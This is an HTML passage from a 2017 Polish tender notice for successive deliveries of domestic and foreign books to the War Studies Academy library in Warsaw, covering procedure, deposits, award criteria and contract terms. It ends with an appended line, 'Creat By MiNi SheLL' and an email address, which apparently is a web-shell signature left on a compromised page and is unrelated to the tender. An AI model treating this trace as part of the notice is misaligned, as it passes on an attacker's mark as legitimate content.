3)dokumentów dotyczących podmiotu trzeciego, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu  jeżeli  wykonawca polega na zasobach podmiotu trzeciego; 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane należycie wraz z dowodami  określającymi, czy dostawy wykazane na potwierdzenie spełniania warunku udziału w postępowaniu, o którym mowa w rozdziale VI ust. 2 pkt 3 SIWZ, zostały wykonane należycie. Wykaz należy sporządzić zgodnie z wzorem stanowiącym załącznik nr 4 do SIWZ. Dowodami potwierdzającymi czy dostawy zostały wykonane należycie są:
-referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane;
-oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym
charakterze wykonawca nie jest w stanie uzyskać dokumentów, o których mowa powyżej. Jeśli wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />W celu zabezpieczenia podpisania umowy przez wykonawców każda oferta musi być zabezpieczona wadium  w wysokości : 
na Część I -  6000,00 PLN;
na Część II  2000,00 PLN
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>10</td></tr><tr><td>dostawa</td><td>20</td></tr><tr><td>czas wymiany podczas reklamacji</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy pod następującymi warunkami:
a) zmiany nazwy lub siedziby zamawiającego / wykonawcy;
b) zmiany stawki VAT od towarów i usług;
c)  zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;
d) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
2.Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>SUKCESYWNA DOSTAWA  KSIĄŻEK KRAJOWYCH <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Sukcesywna dostawa książek krajowych, w wersji drukowanej lub na nośniku elektronicznym, do Biblioteki Głównej Akademii Sztuki Wojennej, określonych opisem bibliograficznym: autor, tytuł, miejsce i rok wydania w jednym lub wielu egzemplarzach na podstawie dostarczonych zamówień wraz z wykazami tytułów sporządzonych przez Zamawiającego z zakresu literatury naukowej, popularnonaukowej. Pod pojęciem sukcesywnej dostawy należy rozumieć dokonywanie etapami zamówień książek, złożonych przez Bibliotekę Główną ASzWoj.
2.Książki będące przedmiotem zamówienia dotyczą poniżej wymienionych dziedzin:
a)nauki humanistyczne,
b)nauki matematyczno  przyrodnicze,
c)nauki społeczne,
d)nauki ekonomiczno  prawne,
e)nauki inżynieryjne i techniczne,
f)nauki o bezpieczeństwie i obronności
g)pozostałe dziedziny, nie wymienione powyżej.
3.Po złożeniu zamówienia przez Bibliotekę Główną ASzWoj, Wykonawca potwierdzi, 
w nieprzekraczalnym terminie 2 dni roboczych, odbiór zamówienia wraz z informacją 
o dostępności tytułów łącznie z wyceną, podając cenę książki do zapłaty przez Zamawiającego, cenę detaliczną netto sugerowaną przez Wydawcę i zastosowany rabat (zgodnie z ofertą).
4.Dostawa książek nastąpi w ciągu maksymalnie 7 dni roboczych od dnia przekazania Zamawiającemu potwierdzenia przyjęcia zamówienia.
5.Dostawa tytułów niepotwierdzonych (niskonakładowych, specjalistycznych książek krajowych wydawanych przez uczelnie wyższe, instytuty naukowe, muzea, stowarzyszenia, fundacje i inne instytucje, a także nie będące w obiegu księgarskim) nastąpi po uzgodnieniu terminu 
z Zamawiającym.
6.Dostawa następuje na koszt i ryzyko Wykonawcy. Miejscem dostawy będzie siedziba Biblioteki Głównej ASzWoj.
7.Zamawiający uprawniony będzie do kontroli przestrzegania uzgodnionych warunków dostawy 
i udzielania Wykonawcy w razie potrzeby niezbędnych wskazówek.
8.Zamawiający dokona odbioru ilościowego i jakościowego każdej dostarczonej partii książek. 
W przypadku niezgodności z zamówieniem Zamawiający powiadamia o tym fakcie Wykonawcę. Wykonawca potwierdzi przyjęcie reklamacji w ciągu 2 dni roboczych.
9.W przypadku dostarczenia książek uszkodzonych lub niezgodnych z umową, Wykonawca zobowiązany jest do przyjęcia reklamacji i ich wymiany, na własny koszt, w terminie maksymalnie 7 dni roboczych od momentu uzyskania zgłoszenia.
10.Usunięcie wady lub wymiana w ramach gwarancji następuje w terminie wskazanym w pkt. 9 lub w terminie uzgodnionym z bezpośrednim użytkownikiem, gdy wymaga tego specyfika albo złożoność naprawy. W przypadku nie podjęcia naprawy gwarancyjnej przez Wykonawcę, Wykonawca zwraca koszty naprawy dokonanej u innego Usługodawcy. 
11.	Okres gwarancji na książki wynosi minimum 12 miesięcy i obejmuje wszystkie wykryte podczas eksploatacji wady, w tym uszkodzenia powstałe w czasie poprawnego, zgodnego 
z przeznaczeniem użytkowania, przy czym Wykonawca może zaproponować dłuższy okres gwarancji.
12.Wykonawca dostarcza do Biblioteki Głównej ASzWoj (wraz z dostawą książek), fakturę wystawioną na Akademię Sztuki Wojennej, która poza wymogami księgowymi musi zawierać dodatkowe informacje: cenę detaliczną netto książki sugerowaną przez Wydawcę, procent rabatu udzielonego przez Wykonawcę od tej ceny (zgodnie ze złożoną ofertą), nazwę jednostki organizacyjnej Zamawiającego oraz imię i nazwisko osoby dokonującej zakupu.
13.Faktura opłacona będzie przelewem bankowym w ciągu 30 dni od daty otrzymania przez Zamawiającego oryginału faktury.
14.Wykonawca będzie posiadał stronę internetową z opisem oferowanych produktów 
i możliwością bezpośredniego zakupu on-line.
15.Szacunkowa (przewidywana) liczba zamawianych książek przez Zamawiającego w czasie trwania umowy może wynosić ok. 6377 szt. Rzeczywista ilość książek wynikać będzie 
z bieżących potrzeb  Zamawiającego.
16.Umowa z wybranym Wykonawcą zostanie podpisana na wartość brutto jaką Zamawiający przeznacza na realizację zamówienia.
17.Rzeczywiste wynagrodzenie Wykonawcy będzie wynikało z faktycznej liczby książek zakupionych przez Zamawiającego w okresie obowiązywania umowy. 
18.Wykonawca zobowiązany jest do informowania przedstawiciela Zamawiającego o stanie zrealizowanych i przyjętych do realizacji zamówień, w formie raportu przesyłanego raz 
w miesiącu (ostatni dzień miesiąca) za pośrednictwem poczty elektronicznej.
19.Zamawiający zastrzega sobie prawo opcji i gwarantuje zamówienie 20% wartości umowy, pozostałe 80% zostanie opcjonalnie zakupione w razie zajścia takiej potrzeby i w zakresie określonym przez Zamawiającego, do granicy pełnego wykorzystania środków finansowych zabezpieczonych na ten cel. W takim zakresie odpowiednio może ulec modyfikacji wartość umowy.
20.Zamówienia będą realizowane w siedzibie Biblioteki Głównej Akademii Sztuki Wojennej, 
Al. gen. A. Chruściela 103, 00-910 Warszawa. 
21.Realizacja dostaw będzie się odbywała w godzinach: od 8.00 do 14.00.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>22111000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>10</td></tr><tr><td>dostawa</td><td>20</td></tr><tr><td>wymiana podczas reklamacji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>SUKCESYWNA DOSTAWA  KSIĄŻEK ZAGRANICZNYCH <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Sukcesywna dostawa książek zagranicznych, w wersji drukowanej lub na nośniku elektronicznym, do Biblioteki Głównej Akademii Sztuki Wojennej, określonych opisem bibliograficznym: autor, tytuł, miejsce i rok wydania w jednym lub wielu egzemplarzach na podstawie dostarczonych zamówień wraz z wykazami tytułów sporządzonych przez Zamawiającego z zakresu literatury naukowej, popularnonaukowej. Pod pojęciem sukcesywnej dostawy należy rozumieć dokonywanie etapami zamówień książek, złożonych przez Bibliotekę Główną ASzWoj.
2.Książki będące przedmiotem zamówienia dotyczą poniżej wymienionych dziedzin:
h)nauki humanistyczne,
i)nauki matematyczno  przyrodnicze,
j)nauki społeczne,
k)nauki ekonomiczno  prawne,
l)nauki inżynieryjne i techniczne,
m)nauki o bezpieczeństwie i obronności
n)pozostałe dziedziny, nie wymienione powyżej.
3.Po złożeniu zamówienia przez Bibliotekę Główną ASzWoj, Wykonawca potwierdzi, 
w nieprzekraczalnym terminie 5 dni roboczych, odbiór zamówienia wraz z informacją 
o dostępności tytułów łącznie z wyceną, podając cenę książki do zapłaty przez Zamawiającego, cenę detaliczną netto sugerowaną przez Wydawcę i zastosowany rabat (zgodnie z ofertą).
4.Dostawa książek nastąpi w ciągu maksymalnie 6 tygodni od dnia przekazania Zamawiającemu potwierdzenia przyjęcia zamówienia.
5.Dostawa tytułów trudnodostępnych (niskonakładowych, specjalistycznych książek wydawanych przez uczelnie wyższe, instytuty naukowe, muzea, stowarzyszenia, fundacje i inne instytucje, a także nie będące w obiegu księgarskim) nastąpi po uzgodnieniu terminu z Zamawiającym.
6.Dostawa następuje na koszt i ryzyko Wykonawcy. Miejscem dostawy będzie siedziba Biblioteki Głównej ASzWoj.
7.Zamawiający uprawniony będzie do kontroli przestrzegania uzgodnionych warunków dostawy 
i udzielania Wykonawcy w razie potrzeby niezbędnych wskazówek.
8.Zamawiający dokona odbioru ilościowego i jakościowego każdej dostarczonej partii książek. 
W przypadku niezgodności z zamówieniem Zamawiający powiadamia o tym fakcie Wykonawcę. Wykonawca potwierdzi przyjęcie reklamacji w ciągu 2 dni roboczych.
9.W przypadku dostarczenia książek uszkodzonych lub niezgodnych z umową, Wykonawca zobowiązany jest do przyjęcia reklamacji i ich wymiany, na własny koszt, 
w terminie maksymalnie 30 dni roboczych od momentu uzyskania zgłoszenia.
10.Usunięcie wady lub wymiana w ramach gwarancji następuje w terminie wskazanym 
w pkt. 9 lub w terminie uzgodnionym z Zamawiającym, gdy wymaga tego specyfika albo złożoność naprawy. W przypadku nie podjęcia naprawy gwarancyjnej przez Wykonawcę, Wykonawca zwraca koszty naprawy dokonanej u innego Usługodawcy.
11.Okres gwarancji na książki wynosi minimum 12 miesięcy i obejmuje wszystkie wykryte podczas eksploatacji wady, w tym uszkodzenia powstałe w czasie poprawnego, zgodnego 
z przeznaczeniem użytkowania, przy czym Wykonawca może zaproponować dłuższy okres gwarancji.
12.	Wykonawca dostarcza do Biblioteki Głównej ASzWoj (wraz z dostawą książek), fakturę wystawioną na Akademię Sztuki Wojennej, która poza wymogami księgowymi musi zawierać dodatkowe informacje: cenę detaliczną netto książki sugerowaną przez Wydawcę, procent rabatu udzielonego przez Wykonawcę od tej ceny (zgodnie ze złożoną ofertą), nazwę jednostki organizacyjnej Zamawiającego oraz imię i nazwisko osoby dokonującej zakupu.
13.Faktura opłacona będzie przelewem bankowym w ciągu 30 dni od daty otrzymania przez Zamawiającego oryginału faktury.
14.Wykonawca będzie posiadał stronę internetową z opisem oferowanych produktów 
i możliwością bezpośredniego zakupu on-line.
15.Szacunkowa (przewidywana) liczba zamawianych książek przez Zamawiającego 
w czasie trwania umowy może wynosić ok. 371 szt. Rzeczywista liczba książek wynikać będzie z bieżących potrzeb Zamawiającego.
16.Umowa z wybranym Wykonawcą zostanie podpisana na wartość brutto jaką Zamawiający przeznacza na realizację zamówienia.
17.Rzeczywiste wynagrodzenie Wykonawcy będzie wynikało z faktycznej liczby książek zakupionych przez Zamawiającego w okresie obowiązywania umowy. 
18.Wykonawca zobowiązany jest do informowania przedstawiciela Zamawiającego o stanie zrealizowanych i przyjętych do realizacji zamówień, w formie raportu przesyłanego raz 
w miesiącu (ostatni dzień miesiąca) za pośrednictwem poczty elektronicznej.
19.Zamawiający zastrzega sobie prawo opcji i gwarantuje zamówienie 20% wartości umowy, pozostałe 80% zostanie opcjonalnie zakupione w razie zajścia takiej potrzeby 
i w zakresie określonym przez Zamawiającego, do granicy pełnego wykorzystania środków finansowych zabezpieczonych na ten cel. W takim zakresie odpowiednio może ulec modyfikacji wartość umowy.
20.Zamówienia będą realizowane w siedzibie Biblioteki Głównej Akademii Sztuki Wojennej, Al. gen. A. Chruściela 103, 00-910 Warszawa. 
21.Realizacja dostaw będzie się odbywała w godzinach: od 8.00 do 14.00.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>22111000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>10</td></tr><tr><td>dostawa</td><td>20</td></tr><tr><td>czas wymiany podczas reklamacji</td><td>10</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com